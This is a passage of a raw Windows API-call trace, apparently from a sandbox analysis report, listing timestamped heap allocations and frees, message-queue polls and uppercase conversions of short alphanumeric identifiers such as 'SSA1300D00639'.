dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.554] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0264.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0264.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0264.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.555] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.555] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0264.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0264.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.556] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0264.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0264.557] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0264.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0264.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.557] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.557] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.558] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.559] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.559] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.559] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.559] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.559] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.560] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.560] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.560] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.560] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.560] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.560] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0264.560] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0264.564] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0264.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.565] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0264.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0264.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.565] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0264.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.566] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.566] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.566] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.566] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.566] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.567] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.567] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.567] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.567] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.568] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0264.568] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.568] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.568] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.568] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.568] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.569] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.569] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.569] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.569] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.570] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.570] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.570] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.570] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.570] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.570] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.571] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0264.571] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.571] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 